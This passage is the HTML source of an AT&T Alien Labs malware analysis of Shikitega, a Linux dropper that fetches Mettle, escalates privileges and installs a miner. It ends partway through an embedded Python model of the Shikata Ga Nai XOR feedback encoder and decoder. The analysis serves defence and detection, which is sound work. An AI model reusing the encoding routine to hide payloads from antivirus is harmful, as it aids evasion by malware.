<!DOCTYPE html>
<html lang="en">

<head>
	

	


	

	<link rel="canonical" href="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux" />

	<title>Shikitega - New stealthy malware targeting Linux | AT&amp;T Alien Labs</title>

	

		

	<meta property="og:site_name" content="AT&amp;T Cybersecurity" />
	<meta property="og:title" content="Shikitega - New stealthy malware targeting Linux" />
	<meta property="og:url" content="https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux" />
	<meta property="og:image" content="https://cdn-cybersecurity.att.com/blog-content/Blog-Images/open-graph/malware-red-sphere-open-graph.jpg" />
	<meta property="og:description" content="Executive summary

AT&amp;T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain in which each module is responsible for one part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.

Key takeaways:


	The malware downloads and executes the Metasploit&rsquo;" />
		

		<script type="text/javascript" src="https://cybersecurity.att.com/public/dbf330b49b00cc2f496a6233c9dc954522001624dcc5"  ></script><script type="text/javascript" src="https://platform-api.sharethis.com/js/sharethis.js#property=619c04ec1bd25500123c9511&product=inline-share-buttons" async="async"></script>

	<meta charset="utf-8">

<link rel="preconnect" href="https://cdn-cybersecurity.att.com" />
<link rel="preconnect" href="https://www.att.com" />
<link rel="preconnect" href="https://www.googletagmanager.com" crossorigin />
<link rel="preconnect" href="https://cdn.vidyard.com" crossorigin />
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin />
<link rel="preconnect" href="https://www.google-analytics.com" crossorigin />
<link rel="preconnect" href="https://play.vidyard.com" crossorigin />
<link rel="preconnect" href="https://adservice.google.com" crossorigin />
<link rel="preconnect" href="https://www.facebook.com" crossorigin />
<link rel="preconnect" href="https://www.google.com" crossorigin />
<link rel="preconnect" href="https://px.ads.linkedin.com" crossorigin />


<style>.async-hide { opacity: 0 !important} </style>
<script>(function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;
    h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};
    (a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;
})(window,document.documentElement,'async-hide','dataLayer',4000,
    {'GTM-WGVFC3T':true});</script>
<link rel="preload" as="script" href="https://cybersecurity.att.com/public/dbf330b49b00cc2f496a6233c9dc954522001624dcc5"/><link rel="preload" href="https://www.googleoptimize.com/optimize.js?id=GTM-WGVFC3T" as="script">
<script async src="https://www.googleoptimize.com/optimize.js?id=GTM-WGVFC3T"></script>


<script src="https://cdn-cybersecurity.att.com/js/v2/imports/top-bundle.min.js?v=20220927602681"></script>


<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataDefinition.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataManager.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/marketing.min.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/detm_adobe.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/engage.min.js" as="script">






<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KLJDXJN');</script>
<!-- End Google Tag Manager -->
<script src='https://www.att.com/scripts/adobe/prod/detm-container-hdr.js' data-restrictions='target' type='text/javascript'></script>


<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="ahrefs-site-verification" content="a6fa0378625f72f89c6f290c3c7559ffee326fb9232cd87fcace798afce3e30d">
<meta name="google-site-verification" content="GTQZz4AGa47UtmP64oC5BB735pkyncjtISHOcQZbIho" />
<meta name="google-site-verification" content="dOSpKecfL6OVRkgr2KvddmhD-l-g3x8vlru1kmbqa9M" />

<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/zero-width.ttf" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Bold.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Regular.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Light.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Medium.woff2" />


<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-LightItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-BoldItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-MediumItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Italic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Black.woff2" />

<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/css/fonts/glyphicons-halflings-regular.woff2" />
<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/av-icons.ttf?e81fxl" />



<link rel="preload" as="style" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20220927602681" />
<link rel="apple-touch-icon" sizes="144x144" href="https://cdn-cybersecurity.att.com/images/uploads/apple-touch-icon.png"/>
<link rel="icon" type="image/png" sizes="32x32" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico"/>
<link rel="shortcut icon" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico">
<link rel="manifest" href="https://cdn-cybersecurity.att.com/manifest.json">

<link rel="stylesheet" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20220927602681" />





<script type="text/javascript">
  	var sc = document.createElement("script");
	sc.setAttribute("src", "https://www.att.com/scripts/adobe/virtual/detm-container-hdr.js");
	sc.setAttribute("type", "text/javascript");
	document.head.appendChild(sc);  
</script>


<script>
	var customAdobeTrackingPageLoadObj = {};
	if (typeof ddo !== "undefined") {initAdobePageTrackingHeader();}
	function adobeVideoCommenceVidyard(player) {
		var commenceEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: player.metadata.length_in_seconds
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Commence', commenceEvent);
		}
	}
	function adobeVideoUpdateVidyard(player) {
		var updateEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: player.metadata.length_in_seconds,
			videoLengthViewed: Math.floor(player.status.currentTime),
			videoProgressPercent: Math.ceil((player.status.currentTime / player.metadata.length_in_seconds) * 100)
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Update', updateEvent);
		}
	}

	function initAdobePageTrackingHeader() {
		ddo.disableAutoPageLoad();
		document.addEventListener('click', function (event) {
			var target = event.target;
			if (!target.href || !target.text) { return true; }
			var linkEvent = {
				slotFriendlyName: "link-click",
				contentFriendlyName: "Link Click",
				mediaCategory: "Security"
			};
			linkEvent.linkName = target.text;
			linkEvent.linkDestinationUrl = target.href;
			if (target.href.indexOf('#watch-') >= 0) {
				linkEvent.slotFriendlyName = 'watch-video';
				linkEvent.contentFriendlyName = 'Watch Video';
				linkEvent.linkName = 'Watch Video';
			}
			ddo.pushEvent("linkClick", "Link_Click", linkEvent);
		});
		
		customAdobeTrackingPageLoadObj['page.location.url'] = '/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux';


		
		
		    customAdobeTrackingPageLoadObj['page.category.siteSubSection1'] = 'blogs';
		


		
		
			customAdobeTrackingPageLoadObj['page.category.siteSubSection2'] = 'labs-research';
		



		
		
			customAdobeTrackingPageLoadObj['page.category.siteSubSection3'] = 'shikitega-new-stealthy-malware-targeting-linux';
		


		
		

		
		


		
			customAdobeTrackingPageLoadObj['page.media.objective'] = 'Awareness';
		

		
	}
</script>


<script type="text/javascript">
    var _elqQ = _elqQ || [];
    _elqQ.push(['elqSetSiteId', '1086385399']);

    _elqQ.push(['elqUseFirstPartyCookie', 'cyber-tracking.att.com']);

    _elqQ.push(['elqTrackPageView', window.location.href]);

    (function () {
        function async_load() {
            var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true;
            s.src = '//img03.en25.com/i/elqCfg.min.js';
            var x = document.getElementsByTagName('script')[0]; x.parentNode.insertBefore(s, x);
        }
        if (window.addEventListener) window.addEventListener('DOMContentLoaded', async_load, false);
        else if (window.attachEvent) window.attachEvent('onload', async_load);
    })();
</script>


	<link rel="alternate" type="application/rss+xml" title="AlienVault Open Threat Exchange Blog" href="/site/blog-all-rss" />

	<style>


	.section-breadcrumb ol {
    margin-top: 0px !important;
    margin-bottom: 10px;
	}

	.flexible-layout .section-breadcrumb ol li a,
	.flexible-layout .section-breadcrumb ol li{
    	color: #000;
    	font-size: 12px;
	}

	.section-breadcrumb .glyphicon {
    font-size: 10px;
    line-height: 10px;
    font-weight: 300;
    color: #000!important;
	}

	.blog-author-info {
		width: 70%;
		float: left;
		color: #191919;
	}

	.blog-subscribe-grid ul {
		margin-left: 0px;
		margin-bottom: 0px;
		padding-left: 0px;
	}

	.blog-subscribe-grid ul li {
		list-style-type: none;
		line-height: 20px;
	}

	.blog-subscribe-grid ul li a {
		color: #c6ced5;
		font-size: 14px;
		text-decoration: none;
	}

	.blog-subscribe-grid ul li a:hover {
		text-decoration: underline;
	}

	.blog-content-area img {
		width: 100%!important;
		height: auto!important;
	}

	.blog-promo-item {
		clear: both;
		overflow: hidden;
		margin-bottom: 30px;
	}
	.promo-block .small {
		text-transform: uppercase;
	}

	.blog-promo-item-text {
		width: 345px;
		float: left;
		max-width:100%;
	}

	.blog-promo-item p {
		margin-bottom: 0px!important;
	}






	#blog-promo-block {
		padding-top: 20px;
	}



	/*promo block and sticky classes*/

	.sticky-sidebar {
		top: 147px;
		position: -webkit-sticky; /* Safari */
		position: sticky;
	}
	     .sidebar-search {
			 margin-bottom: 30px;
		 }

         .sidebar-search .search-button {
                width: 100%;
                position: relative;
            }

            .sidebar-search .search-button input {
                padding: 0px;
                margin: 2px 0px 0px 0px;
                position: absolute;
                background: url(https://cdn-cybersecurity.att.com/images/icn-sidebar-search.png) top left no-repeat;
                background-size: 25px 25px;
                width: 25px;
                height: 25px;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                left: 10px;
                top: 6px;
             }

			.sidebar-search .search-field input {
                border: 0;
                width: 100%;
                height: 30px;
                padding-left: 50px;
				margin-top: 5px;
            }

            .sidebar-search .search-field {
                border: 1px solid #CCCCCC;
                width: 100%;
                height: 40px;
            }

            #q::placeholder {
          		color: #767676!important;
            }

            #blog-subscribe-box {
			height:auto;
            padding: 32px;
            background-image: url('https://cdn-cybersecurity.att.com/images/uploads/backgrounds/blog-email-subscribe-bkg.jpg');
            background-size: cover;
            }

            #blog-subscribe-box h2 {
            color: #fff;
            font-size:32px;
            }

			#blog-subscribe-box p {
				margin-bottom: 10px;
			}






	@media (max-width: 991px) {
            .sidebar-search .search-button input {
                padding: 0px;
                background: transparent;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                right: 5px;
                top: 5px;
                padding-left: 0px;
             }

            .sidebar-search .search-field input {
             padding-left: 15px;
             }


            }

            	@media (min-width: 768px) and (max-width: 920px){
	.blog-subscribe-grid .btn {
		border-radius: 24px;
	    font-size: 12px;
	    line-height: 18px;
	    border: none;
	    padding: 6px 36px;
	    height: 30px;
	    font-weight: 500;
	}
}


		.blog-content-area p,
		.blog-content-area ul li,
		.blog-content-area ol li{
			font-size: 16px;
			line-height: 20px;
			font-weight: 400;
		}
		.blog-content-area ul li,
		.blog-content-area ol li {
			margin-bottom: 10px;
		}

		.blog-content-area {
		margin-top: 30px;
		}

		.flexible-layout .section-breadcrumb {
		margin-bottom: 30px;
		}

		.blog-detail h1 {
    		color: #000;
			background: transparent;
    		padding: 0px;
		}

		.blog-title-date-author-area {
			padding-bottom: 20px;
			border-bottom: #959595 1px solid;
		}

		.blog-body {
		padding-top: 20px;
		}


		.blog-detail .blog-categories {
    background-color: transparent;
    border-bottom: 1px solid #959595;
    border-top: 1px solid #959595;
    padding: 20px 0px 20px 0px;
    color: #000;
    margin: 30px 0px;
    font-size: 16px;
    line-height: 24px;
	font-weight: 400;
	}

	.blog-detail .blog-categories a {
	font-weight: 400;
	}

	.blog-share {
	margin-top: 60px;
	text-align: center;
	margin-bottom: 60px;
	}

	.blog-listing-social {
		display: block;
	}

	#st-1 .st-btn {
	  border-radius: 25px!important;
	  border: none;
	  cursor: pointer;
	  display: inline-block;
	  font-size: 12px;
	  height: 45px!important;
	  line-height: 40px!important;
	  margin-right: 8px;
	  padding: 0 10px;
	  position: relative;
	  text-align: center;
	  top: 0;
	  vertical-align: top;
	  white-space: nowrap;
	  margin-right: 20px!important;
	}

	#st-1 .st-btn > img {
	  display: inline-block;
	  height: 25px!important;
	  width: 25px!important;
	  position: relative;
	  top: 10px;
	  vertical-align: top;
	  }

	  #st-1 .st-btn[data-network='email'] {
	  	background-color: #e0752d!important;
	  }

	  .st-first {
	  	margin-left: 20px!important;
	  }

	</style>

</head>

	<body class="listing-blog-entry-id-7865">
			<!-- Google Tag Manager (noscript) -->
<noscript><iframe src='https://www.googletagmanager.com/ns.html?id=GTM-KLJDXJN'
height='0' width='0' style='display:none;visibility:hidden'></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<script src='https://www.att.com/scripts/adobe/prod/detm-container-ftr.js' type='text/javascript'></script>


		<header id="header" class="navbar navbar-fixed-top">

	<style>
@media (max-width: 543px) {
	.hide-on-mobile {
		display: none;
	}
}
</style>

<div id="news-banner">
    <div class="container-fluid">
        <div class="row vcenter">
            <div class="col-sm-12">

                <div id="news-headline-link">
					<a href="/products/strategy-and-roadmap/sase-readiness" class="text-white">
						Start your SASE readiness consultation today.
						<span class="hide-on-mobile">Learn more</span> &LongRightArrow;
					</a>
                </div>
				<div id="search-contact">
					<ul class="list-unstyled header_nav_top_list">
						<li class="header_nav_top_list_item"><a id="top-nav-support" href="/support">Support</a></li>
						<li class="header_nav_top_list_item"><a id="top-nav-contact" href="/contact">Contact</a></li>
						<li class="header_nav_top_list_item search">
							<form action="/search-results" method="get" id="top-search-form"><input name="q" id="top-search-form-text" type="text" placeholder="Search" aria-label="Search"><button type="submit"><span class="glyphicon glyphicon-search"></span></button></form>

						</li>
					</ul>
				</div>
            </div>
        </div>
    </div>
</div>






	<div id="header-container" class="container-fluid">
		<div id="header-logo">
			<div class="logo-globe"><a href="https://business.att.com" target="_blank"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-globe.svg" alt="AT&amp;T Business" /></a></div>
			<div class="att-business"><a href="https://business.att.com" target="_blank"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-business-web.svg" alt="AT&amp;T Business" /></a></div>
			<div class="att-cybersecurity"><a href="/"><img src="https://cdn-cybersecurity.att.com/images/uploads/logos/att-cybersecurity-web.svg" alt="AT&amp;T Cybersecurity" /></a></div>
		</div>

		<button type="button" class="header_toggle_nav navbar-toggle collapsed" data-toggle="collapse" data-target="#header-nav" aria-expanded="false">
			<span class="sr-only">Toggle navigation</span>
			<span class="avicon avicon-bars"></span>
			<span class="avicon avicon-close"></span>
		</button>
		
		
			<a href="/contact" id="header-cta" class="hidden-md hidden-lg btn btn-blue btn-sm">Contact us</a>
		

		<nav class="navbar-collapse collapse" id="header-nav">
			<ul class="nav navbar-nav list-unstyled">
				<li class="nav-item mobile-search visible-sm visible-xs">
					<form action="/search-results" method="get" id="mobile-search-form"><input name="q" id="mobile-search-form-text" type="text" placeholder="Search" aria-label="Search"><button type="submit"><span class="glyphicon glyphicon-search"></span></button></form>
				</li>
				<li class="nav-item has-dd products">
					<a id="main-nav-products" href="/products" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#products-dd">Products<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span>
					</a>
					<div class="nav-dropdown collapse" id="products-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav">
									<li id="first-sub-cyber-strategy-risk"><a href="/categories/cybersecurity-consulting-services" class="first-level">Cybersecurity Consulting Services</a>
										<div class="desktop-subnav open">
											<ul class="list-unstyled">
												<li class="second-sub-heading">Cyber Strategy</li>
												<li class="second-sub-link"><a href="/products/strategy-and-roadmap">Strategy and Roadmap Planning</a></li>

												<li class="second-sub-link"><a href="/products/security-assessment">Enterprise Security Assessment Services</a></li>
												<li class="second-sub-link"><a href="/products/risk-based-cyber-posture-assessment">Risk-based Cyber Posture Assessment</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">Risk and Compliance</li>
												<li class="second-sub-link"><a href="/products/security-compliance">Security Compliance</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">Vulnerability and Threat Management</li>
												<li class="second-sub-link"><a href="/products/managed-vulnerability-program">Managed Vulnerability Program</a></li>
												<li class="second-sub-link"><a href="/products/penetration-testing-services">Penetration Testing</a></li>
												<li class="second-sub-link"><a href="/products/adversary-simulation-service">Adversary Simulation Services</a></li>
												<li class="second-sub-link"><a href="/products/incident-response">Incident Response Services</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">CSO Advisory Services</li>
												<li class="second-sub-link"><a href="/products/cybersecurity-iq-training">Cybersecurity IQ Training</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
												<li class="second-sub-link"><a href="/products/strategy-and-roadmap">Strategy and Roadmap Planning</a></li>
												<li class="second-sub-link"><a href="/products/security-assessment">Enterprise Security Assessment Services</a></li>
												<li class="second-sub-link"><a href="/products/risk-based-cyber-posture-assessment">Risk-based Cyber Posture Assessment</a></li>

												<li class="second-sub-link"><a href="/products/security-compliance">Security Compliance</a></li>

												<li class="second-sub-link"><a href="/products/managed-vulnerability-program">Managed Vulnerability Program</a></li>

												<li class="second-sub-link"><a href="/products/penetration-testing-services">Penetration Testing</a></li>
												<li class="second-sub-link"><a href="/products/adversary-simulation-service">Adversary Simulation Services</a></li>
												<li class="second-sub-link"><a href="/products/incident-response">Incident Response Services</a></li>
												<li class="second-sub-link"><a href="/products/cybersecurity-iq-training">Cybersecurity IQ Training</a></li>
											</ul>
										</div>
									</li>
                                    <li id="first-sub-managed-security-services"><a href="/categories/managed-security-services" class="first-level">Managed Security Services</a>
                                        <div class="desktop-subnav">
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Network Security</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-branch-with-fortinet">SASE Branch with Fortinet</a></li>
												<li class="second-sub-link"><a href="/products/sase-with-palo-alto-networks">SASE with Palo Alto Networks</a></li>
                                                <li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
                                                <li class="second-sub-link"><a href="/categories/network-security">View All</a></li>
                                            </ul>
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Threat Detection</li>
                                                <li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
                                            </ul>
                                            <ul class="list-unstyled">
                                                <li class="second-sub-heading">Endpoint Security</li>
                                                <li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
                                                <li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
                                                <li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
                                            </ul>

                                        </div>
                                        <div class="mobile-subnav">
                                            <ul class="list-unstyled sub-nav">
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
                                                <li class="second-sub-link"><a href="/products/sase-branch-with-fortinet">SASE Branch with Fortinet</a></li>
												<li class="second-sub-link"><a href="/products/sase-with-palo-alto-networks">SASE with Palo Alto Networks</a></li>
                                                <li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
                                                <li class="second-sub-link"><a href="/products/managed-threat-detection-and-response">Managed Threat Detection and Response</a></li>
                                                <li class="second-sub-link"><a href="/products/sentinel-one">SentinelOne</a></li>
                                                <li class="second-sub-link"><a href="/products/mobile-iron">MobileIron</a></li>
                                                <li class="second-sub-link"><a href="/products/lookout">Lookout Mobile Endpoint Security</a></li>
                                            </ul>
                                        </div>
                                    </li>
									<li id="first-sub-network-security"><a href="/categories/network-security" class="first-level">Network Security</a>
										<div class="desktop-subnav">
											<ul class="list-unstyled">
												<li class="second-sub-heading">AT&amp;T Trusted Internet Access</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
												<li class="second-sub-link"><a href="/products/secure-workforce-with-check-point">Secure Workforce with Check Point</a></li>

												<li class="second-sub-link"><a href="/products/network-based-firewall">Network Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall">Premises Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall-express-with-check-point">Premises-Based Firewall Express with Check Point</a></li>
												<li class="second-sub-link"><a href="/products/enhanced-access-security">Enhanced Cybersecurity Services</a></li>
											</ul>
											<ul class="list-unstyled">
												<li class="second-sub-heading">AT&amp;T Infrastructure and Application Protection</li>
												<li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
												<li class="second-sub-link"><a href="/products/application-layer-security">AT&amp;T Application Layer Security</a></li>
											</ul>
										</div>
										<div class="mobile-subnav">
											<ul class="list-unstyled sub-nav">
												<li class="second-sub-heading">AT&amp;T Trusted Internet Access</li>
												<li class="second-sub-link"><a href="/products/secure-web-gateway">Secure Web Gateway</a></li>
												<li class="second-sub-link"><a href="/products/secure-remote-access">Secure Remote Access</a></li>
												<li class="second-sub-link"><a href="/products/secure-workforce-with-check-point">Secure Workforce with Check Point</a></li>
												<li class="second-sub-link"><a href="/products/network-based-firewall">Network Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall">Premises Based Firewalls</a></li>
												<li class="second-sub-link"><a href="/products/premises-based-firewall-express-with-check-point">Premises-Based Firewall Express with Check Point</a></li>
												<li class="second-sub-link"><a href="/products/enhanced-access-security">Enhanced Cybersecurity Services</a></li>

												<li class="second-sub-heading">AT&amp;T Infrastructure and Application Protection</li>
												<li class="second-sub-link"><a href="/products/reactive-ddos-services">Reactive Distributed Denial of Service Defense</a></li>
												<li class="second-sub-link"><a href="/products/application-layer-security">AT&amp;T Application Layer Security</a></li>
											</ul>
										</div>
									</li>

							</ul>
						</div>
					</div>
				</li>
			</ul>
		</nav>

	</div>

</header>

						




			<main class="blog-detail flexible-layout">


				<section class="full-width-block">

					<div class="container-fluid">

						<div class="row flx-container">
							<div class="col-sm-7">
								<div class="blog-content-area">
									<div class="blog-title-date-author-area">
										<h1>Shikitega - New stealthy malware targeting Linux</h1>
										<div class="date">September 6, 2022 &nbsp;|&nbsp; <a href="/blogs/author/ofer-caspi">Ofer Caspi</a></div>
									</div>
									<div class="blog-body">
										<h2>Executive summary</h2>

<p>AT&amp;T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.</p>

<h2>Key takeaways:</h2>

<ul>
	<li>The malware downloads and executes Metasploit&rsquo;s &ldquo;Mettle&rdquo; meterpreter to maximize its control over infected machines.</li>
	<li>Shikitega exploits system vulnerabilities to gain high privileges, persist, and execute a crypto miner.</li>
	<li>The malware uses a polymorphic encoder to make it more difficult for anti-virus engines to detect.</li>
	<li>Shikitega abuses legitimate cloud services to host some of its command and control (C&amp;C) servers.</li>
</ul>

<p><img alt="Shikitega" data-original="https://cdn-cybersecurity.att.com/blog-content/shikitega.jpg" /></p>

<p style="text-align:center">Figure 1. Shikitega operation process.</p>

<h2>Background</h2>

<p><a href="https://atlasvpn.com/blog/linux-malware-on-a-rise-reaching-all-time-high-in-h1-2022" target="_blank">With a rise of nearly 650%</a> in malware and ransomware for Linux this year, reaching an all-time high in the first half of 2022, threat actors find Linux-based servers, endpoints and IoT devices more and more valuable and keep finding new ways to deliver their malicious payloads. New malware like <a href="https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits" target="_blank">BotenaGo</a> and <a href="https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers" target="_blank">EnemyBot</a> are examples of how malware writers rapidly incorporate recently discovered vulnerabilities to find new victims and increase their reach.</p>

<p>Shikitega uses a multi-layered infection chain in which the first stage contains only a few hundred bytes and each module is responsible for a specific task: downloading and executing the Metasploit meterpreter, exploiting Linux vulnerabilities, establishing persistence on the infected machine, and downloading and executing a cryptominer.</p>

<h2>Analysis</h2>

<p>The main dropper of the malware is a very small ELF file: its total size is only around 370 bytes, while its actual code size is around 300 bytes (figure 2).</p>

<p><img alt="Malicious ELF" data-original="https://cdn-cybersecurity.att.com/blog-content/malicious_ELF.jpg" /></p>

<p style="text-align:center">Figure 2. Malicious ELF file with a total of only 376 bytes.</p>

<p>The malware uses the &ldquo;<a href="https://en.wikipedia.org/wiki/Shikata_ga_nai">Shikata Ga Nai</a>&rdquo; polymorphic XOR additive feedback encoder, one of the most popular encoders in Metasploit. With this encoder the malware runs through several decode loops, where each loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stub is generated with dynamic instruction substitution and dynamic block ordering, and the registers it uses are also selected dynamically. Below we can see how the encoder decrypts the first two loops (figures 3 and 4).</p>

<p><img alt="Shikitega decryption" data-original="https://cdn-cybersecurity.att.com/blog-content/shikata_decryption_1.jpg" /></p>

<p style="text-align:center">Figure 3. First &ldquo;Shikata Ga Nai&rdquo; decryption loop.</p>

<p style="text-align:center"><img alt="Shikata decryption 2" data-original="https://cdn-cybersecurity.att.com/blog-content/shikata_decryption_2.jpg" /></p>

<p style="text-align:center">Figure 4. Second &ldquo;Shikata Ga Nai&rdquo; decryption loop created by the first one.</p>
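<p>To make the additive-feedback scheme concrete, here is a small Python model of the arithmetic the decode loop performs on each dword, added for this write-up (it is not code from the malware or from Metasploit). It assumes the &ldquo;xor, then add the decoded dword&rdquo; ordering seen in such stubs and a 32-bit key recovered from the stub; the polymorphic stub generation itself is not modeled, and the payload and keys in it are constructed.</p>

```python
"""Model of the XOR additive-feedback arithmetic behind "Shikata Ga Nai".

Added example for this write-up; not code from the malware or from Metasploit.
Only the per-dword arithmetic of the decode loop is modeled, in one common
ordering (real stubs vary instruction order and register choice):

    plain = cipher ^ key            ; xor [reg+off], key_reg
    key   = (key + plain) & MASK    ; add key_reg, [reg+off]

Because the key changes after every dword, the same plaintext never produces
the same ciphertext twice. That is why a byte signature on the encoded body
does not work and why an analyst peels the layers with the recovered keys.
"""
import struct
from typing import Iterable

MASK = 0xFFFFFFFF  # the stub works on 32-bit registers


def _pad(data: bytes) -> bytes:
    """Pad to whole dwords; the stub only ever processes 4-byte blocks."""
    return data + b"\x00" * (-len(data) % 4)


def sgn_encode(plain: bytes, key: int) -> bytes:
    """Encode one layer. Used here only to build constructed test input."""
    out = bytearray()
    for (p,) in struct.iter_unpack("<I", _pad(plain)):
        out += struct.pack("<I", p ^ key)
        key = (key + p) & MASK  # feedback on the *decoded* dword
    return bytes(out)


def sgn_decode(cipher: bytes, key: int) -> bytes:
    """Decode one layer, given the key from the stub's 'mov reg, imm32'."""
    if len(cipher) % 4:
        raise ValueError("encoded body must be a whole number of dwords")
    out = bytearray()
    for (c,) in struct.iter_unpack("<I", cipher):
        p = c ^ key
        out += struct.pack("<I", p)
        key = (key + p) & MASK
    return bytes(out)


def peel_layers(body: bytes, keys: Iterable[int]) -> bytes:
    """Apply sgn_decode once per layer, outermost key first, mirroring the
    chained decode loops (loop 1 reveals loop 2, and so on)."""
    for key in keys:
        body = sgn_decode(body, key)
    return body


def repeated_dwords(cipher: bytes) -> int:
    """Count dwords that occur more than once in the encoded body. With the
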